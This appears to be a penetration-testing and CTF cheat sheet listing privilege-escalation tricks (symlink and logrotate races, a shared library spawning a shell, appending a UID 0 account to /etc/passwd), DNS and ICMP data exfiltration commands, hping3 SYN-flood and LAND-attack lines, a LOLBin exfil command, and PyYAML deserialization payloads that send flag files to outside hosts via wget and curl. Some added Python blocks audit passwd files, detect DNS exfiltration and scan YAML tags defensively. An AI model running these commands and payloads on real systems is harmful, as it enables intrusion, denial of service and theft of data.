- https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
- http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
- http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
- https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Building_A_Lab.md
- Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
- Shodan Exploits
- CVE security vulnerability database. Security vulnerabilities, exploits, references and more
- Exploit Files - Packet Storm
- Vulners - Vulnerability Data Base
- 💀 Sploitus | Exploit & Hacktool Search Engine
- Snyk - Open Source Security
- SG TCP/IP Ports Database
# https://github.com/offensive-security/exploitdb.git
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
# Given exploit with available metasploit module
msf > search $regex
-
username=
password=
cookie1="PHPSESSID=3k21rt4acut215r1adlrq5m0p0"
cookie2="PHPSESSID=ck8pgb52nkkb8sdg2c95ms7s16"
url="http://202.120.7.197/app.php"
curl "$url?action=login" -b $cookie1 -d "username=$username&pwd=$password" &
curl "$url?action=login" -b $cookie2 -d "username=$username&pwd=$password"
curl "$url?action=buy&id=1" -b $cookie1
curl "$url?action=sale&id=1" -b $cookie1 &
curl "$url?action=sale&id=1" -b $cookie2
- https://github.com/saw-your-packet/ctfs/blob/master/DarkCTF/Write-ups.md#-chain-race
- ~/share/ctf/darkctf2020/chain-race/
while true; do
dd if=/dev/urandom count=$((1024 * 20)) bs=1024 > bigfile
chmod 777 bigfile
/exploitable bigfile &
ln -sf /root/flag.txt bigfile
sleep 0.1
rm -f bigfile
done
- Book - HackThebox | Samir Ettali
- https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
# logrotate: stat /tmp/logs/file.log
# attacker:
mv /tmp/logs /tmp/logs2
ln -s /etc/bash_completion.d /tmp/logs
# logrotate: create+chown /tmp/logs/file.log
# attacker:
echo 'payload' > /tmp/logs/file.log
# On root login, payload executed
- busybox - act as arbitrary file
# if owner of file, can use chmod to fix permissions
upx -o /tmp/chmod /bin/busybox
# || tar
# || /lib/ld-musl-x86_64.so.1 /bin/busybox cat
# || setpriv /bin/busybox cat
- root owned + bad permissions (e.g. 777)
- if shared library, compile our own, given called function "foo":
#include <stdlib.h>
void foo() { system("/bin/sh"); }
gcc vuln.c -shared -o vuln.so
- ~/opt/privilege-escalation-awesome-scripts-suite/
- ~/opt/LinEnum/
sudo -l
# specific uid
find / -uid 1001 -type f 2>/dev/null
# suid
find / -perm -u=s -type f 2>/dev/null
- /etc/shadow
- hash algorithm: $1 = MD5
- /etc/passwd
- password field
- empty: user1::.....
- disabled: user1:*:.....
- in /etc/shadow: user1:x:.....
# Given pass `foo` encrypted as `aaKNIEDOaueR6`
perl -le 'print crypt("foo", "aa")'
# || Encrypt with random salt
openssl passwd foo
echo "root2:aaKNIEDOaueR6:0:0:root:/root:/bin/bash" >> /etc/passwd
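Added example (not from these notes): an audit over constructed /etc/passwd and /etc/shadow text that flags the three things listed above from the defender's side, an empty password field, a hash sitting in world-readable /etc/passwd or an extra UID 0 account, and weak hash algorithms ($1 = MD5, or a bare 13-character DES crypt like aaKNIEDOaueR6). The account names and hashes are constructed.

```python
import re

# crypt(3) id -> algorithm; "$1" = MD5 as noted above. No "$" prefix means the
# 13-char traditional DES crypt, e.g. the aaKNIEDOaueR6 value used above.
HASH_IDS = {"1": "MD5", "2b": "bcrypt", "5": "SHA-256", "6": "SHA-512", "y": "yescrypt"}
WEAK = {"MD5", "DES"}

def hash_algo(field):
    """Name the algorithm behind a password field, or None if empty/locked."""
    if field == "" or field.startswith(("*", "!")):
        return None
    m = re.match(r"\$([^$]+)\$", field)
    if m:
        return HASH_IDS.get(m.group(1), "unknown:" + m.group(1))
    return "DES"

def audit(passwd_text, shadow_text):
    """Return (account, finding) pairs for the misconfigurations listed above."""
    shadow = {}
    for line in shadow_text.splitlines():
        if line.strip():
            name, field = line.split(":")[:2]
            shadow[name] = field
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        name, pw, uid = line.split(":")[:3]
        if pw == "":
            findings.append((name, "empty password field in /etc/passwd"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "hash stored in world-readable /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        # "x" defers to /etc/shadow; anything else is the hash itself
        algo = hash_algo(shadow.get(name, "") if pw == "x" else pw)
        if algo in WEAK:
            findings.append((name, "weak hash algorithm " + algo))
    return findings

# Constructed sample files (no real system)
PASSWD = """root:x:0:0:root:/root:/bin/bash
user1:x:1001:1001::/home/user1:/bin/bash
user2:*:1002:1002::/home/user2:/bin/bash
user3::1003:1003::/home/user3:/bin/bash
root2:aaKNIEDOaueR6:0:0:root:/root:/bin/bash
"""
SHADOW = """root:$6$saltsalt$hashhashhashhash:19000:0:99999:7:::
user1:$1$saltsalt$hashhashhashhash:19000:0:99999:7:::
user2:*:19000:0:99999:7:::
"""
```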
- https://en.wikipedia.org/wiki/Crypt_(C)#Key_derivation_functions_supported_by_crypt
- ~/code/src/pocs/dirtycow/dirty.c
- ~/code/src/pocs/cowroot.c
- https://github.com/SecWiki/linux-kernel-exploits/tree/master/2014/CVE-2014-3153
- ODBC
-- Given: .odbc.ini
-- [lalala]
-- Driver=/var/lib/clickhouse/user_files/test.so
SELECT * FROM odbc('DSN=lalala', 'test', 'test');
- Hacking with Environment Variables
- /proc/self/cmdline
- /proc/self/cwd
- /proc/self/environ
- /proc/self/exe
- /proc/self/maps
- [!] zero size, but sequentially readable (e.g. cat, HTTP request with header Range: bytes 0-4096)
- DNS
- https://www.aldeid.com/wiki/File-transfer-via-DNS
# 1. server
sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.1.29'
# 2. client
for b in `cat loremipsum.hex`; do dig @192.168.1.23 $b.fakednsrequest.com; done
# 3. server
tcpdump -n -r loremipsum.pcap 'host 192.168.1.29 and host 192.168.1.23' \
 | grep fakednsrequest \
 | cut -d ' ' -f 8 \
 | cut -d '.' -f 1 \
 | uniq \
 | xxd -r -p > loremipsum.txt
- https://github.com/leonjza/dnsfilexfer
- https://github.com/vp777/DNS-data-exfiltration
- https://github.com/coryschwartz/dns_exfiltration
- https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/
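Added example (not from the links above): the detection side of the hex-over-DNS transfer shown above. It groups queries whose leftmost label is a long pure-hex chunk by (client, parent domain), drops consecutive retransmits the way the `uniq` step does, and reassembles the hex so an analyst can see what left. The query-log lines, client addresses and message are constructed; fakednsrequest.com is the name from the notes.

```python
import re
from collections import defaultdict

# Constructed message and query log (no real hosts): the sender hex-encodes the
# data and asks for one <hex-chunk>.fakednsrequest.com name per 8-byte chunk.
MESSAGE = b"constructed: lorem ipsum dolor sit amet!"
HEX = MESSAGE.hex()
SAMPLE_LOG = ["192.168.1.29 www.example.com", "192.168.1.30 deadbeef.cdn.example.net"]
SAMPLE_LOG += [f"192.168.1.29 {HEX[i:i + 16]}.fakednsrequest.com" for i in range(0, len(HEX), 16)]
SAMPLE_LOG += ["192.168.1.29 mail.example.com"]

HEX_LABEL = re.compile(r"^[0-9a-fA-F]{12,}$")  # leftmost label is a long pure-hex chunk

def parent_domain(qname, levels=2):
    """Last `levels` labels of a query name, e.g. fakednsrequest.com."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])

def find_hex_exfil(log_lines, min_queries=5):
    """Group hex-label queries per (client, parent domain) and return the
    reassembled hex for every group with at least min_queries chunks."""
    chunks = defaultdict(list)
    for line in log_lines:
        client, qname = line.split()[:2]   # constructed format: "<client> <qname>"
        first = qname.split(".")[0]
        if not HEX_LABEL.match(first):
            continue
        key = (client, parent_domain(qname))
        if chunks[key] and chunks[key][-1] == first:
            continue                       # consecutive duplicate, like `uniq` above
        chunks[key].append(first)
    return {k: "".join(v) for k, v in chunks.items() if len(v) >= min_queries}
```

Short hex labels such as CDN cache keys stay below the 12-character threshold; tune it and min_queries against your own resolver logs before alerting.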
- TCP
# ICMP (using file contents)
hping3 -E foo.txt -1 -u -i 10 -d 1.2.3.4 95
# TCP ACK (using file contents)
hping3 -E foo.txt -A 1.2.3.4
# SYN flood
hping3 -V -c 1000 -d 100 -p 8080 -S --flood 1.2.3.4
# LAND attack
hping3 -V -c 1000 -d 100 -p 8080 -s 18080 -S -k -a 1.2.3.4 1.2.3.4
# https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-20e5e9c1ed8e
C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe /out:C:\\temp\\foo /uri:https://foo?$data
- URI scheme
- file, ftp, zlib, data, glob, phar, ssh2, rar, ogg, ftps, compress.zlib, compress.bzip2, zip
- bypass URL access rules with redirections (responses with code 3xx)
- repeat parameter containing url to visit: 2nd url redirects to 3rd url
<?php
header('HTTP/1.1 301 Redirect');
header('Location: php://filter/string.toupper/resource=index.php');
?>
- USB over IP
# On localhost:
# Given "GatewayPorts yes" enabled in $vps_host sshd_config
ssh $user@$vps_host -R 3240:localhost:3240
# On $vps_host:
sudo modprobe usbip-host
sudo modprobe usbip-core
sudo usbipd -D
sudo usbip list -l
# Take bus id of second keyboard = 1-7
sudo usbip --debug bind -b 1-7
# On $vulnerable_host:
# Given TTY of connected user = ttyS0
/sbin/usbip attach -r $vps_host -b 1-7 &
cat /dev/ttyS0
# On $vps_host:
cat flag.txt > /dev/ttyS0
- TLS SNI field
- base64
- 4 char block = 3 char message
echo 00 | xxd -r -p | base64 # AA==
echo 0000 | xxd -r -p | base64 # AAA=
echo 000000 | xxd -r -p | base64 # AAAA
echo 41 | xxd -r -p | base64 # QQ==
echo 4141 | xxd -r -p | base64 # QUE=
echo 414141 | xxd -r -p | base64 # QUFB
- URL payloads: base64url
- public keys - JWK
- https://en.wikipedia.org/wiki/Category:Binary-to-text_encoding_formats
- hostnames
- replacement character - replace an unknown, unrecognized or unrepresentable character
\xEF\xBF\xBD = U+FFFD = �
- https://en.wikipedia.org/wiki/Specials_%28Unicode_block%29
- Morse code consists of "dot", "dash" and "interval" elements. The ratio of "dot" to "dash" is 1:3; the ratio of "intra-code interval", "inter-code interval" and "code group interval" is 1:3:5
- ~/Downloads/Morse Recognition Algorithm Based on K-means.pdf
- "dot" = ".", "dash" = "-", "intra-code interval" = " ", "inter-code interval" = " ", "code group interval" = "/"
- https://morsecode.world/international/timing.html
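Added example (not from the paper or the notes): a decoder that turns a keyed on/off timing sequence into the symbols above using the 1:3 dot/dash ratio and the 1:3:5 interval ratios. It assumes the shortest element in the signal is one unit, and the cut-offs at 2 and 4 units sit between the ratios so moderate timing jitter still classifies correctly. The test signal is constructed by the inverse function in the same block.

```python
# International Morse letters, keyed by the symbol string used in the notes above
MORSE = {".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
         "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
         "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
         "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
         "-.--": "Y", "--..": "Z"}

def timing_to_symbols(signal):
    """Classify (key_down, duration) pairs into '.', '-', ' ' (inter-code) and '/'
    (code group). Assumes the shortest element (dot or intra-code gap) is 1 unit;
    cut-offs at 2 and 4 units fall between the 1:3:5 ratios and absorb jitter."""
    unit = min(d for _, d in signal)
    out = []
    for down, dur in signal:
        units = dur / unit
        if down:
            out.append("." if units < 2 else "-")   # 1 unit = dot, 3 units = dash
        elif units < 2:
            continue                                # intra-code gap: same letter
        elif units < 4:
            out.append(" ")                         # inter-code gap: next letter
        else:
            out.append("/")                         # code group gap: next word
    return "".join(out)

def decode(symbols):
    """Map the symbol string to text; unknown codes become '?'."""
    words = []
    for word in symbols.split("/"):
        words.append("".join(MORSE.get(c, "?") for c in word.split(" ") if c))
    return " ".join(w for w in words if w)

def symbols_to_timing(symbols, unit=10):
    """Inverse mapping, used here only to build a constructed test signal."""
    sig = []
    for s in symbols:
        if s in ".-":
            if sig and sig[-1][0]:
                sig.append((False, unit))           # intra-code gap between elements
            sig.append((True, unit if s == "." else 3 * unit))
        elif s == " ":
            sig.append((False, 3 * unit))
        elif s == "/":
            sig.append((False, 5 * unit))
    return sig
```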
- sound of keystrokes to keys
- digital radio transmission decoder
- PyYAML yaml.load()
- https://imcmy.me/hitcon-ctf-2016-writeup-archive/
some_option: !!python/object/apply:os.system ["cat flag.txt"]
# ||
some_option: !!python/object/apply:subprocess.call
  args: [wget foo.com/"$(cat flag)"]
  kwds: {shell: true}
- https://hackmd.io/@harrier/uiuctf20
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl -POST mil1\x2eml/jm9 -F x=@flag\x2etxt')"
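Added example (not from the writeups above): a pre-parse check that lists every PyYAML `!!python/*` tag in a document and flags the ones that construct or call Python objects, which is exactly the mechanism both payload shapes above rely on. The sample documents are constructed; the real control is `yaml.safe_load()`, which rejects all of these tags, and this scan only matches the short `!!python/` form, not the long `!<tag:yaml.org,2002:python/...>` spelling.

```python
import re

# Every !!python/* tag is PyYAML-specific; these five resolve or call arbitrary
# Python objects and are the ones behind the payloads above. Long-form
# !<tag:yaml.org,2002:python/...> tags are not matched here.
PY_TAG = re.compile(r"!!python/([\w/]+)(?::([\w.]+))?")
DANGEROUS = {"object", "object/apply", "object/new", "name", "module"}

def find_python_tags(doc):
    """Return (tag, target, line_no) for each !!python/* tag in a YAML text."""
    hits = []
    for n, line in enumerate(doc.splitlines(), 1):
        for m in PY_TAG.finditer(line):
            hits.append((m.group(1), m.group(2) or "", n))
    return hits

def is_unsafe(doc):
    """True if yaml.load() with a non-safe loader could run code for this text.
    yaml.safe_load() refuses all of these tags; use it rather than relying on this."""
    return any(tag in DANGEROUS for tag, _, _ in find_python_tags(doc))

# Constructed samples: the two payload shapes from the writeups, plus a benign file
SAMPLE_APPLY = 'some_option: !!python/object/apply:os.system ["cat flag.txt"]\n'
SAMPLE_NEW = ('!!python/object/new:type\n'
              '  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]\n')
SAMPLE_OK = "some_option: !!str 42\nlist: [1, 2, 3]\n"
```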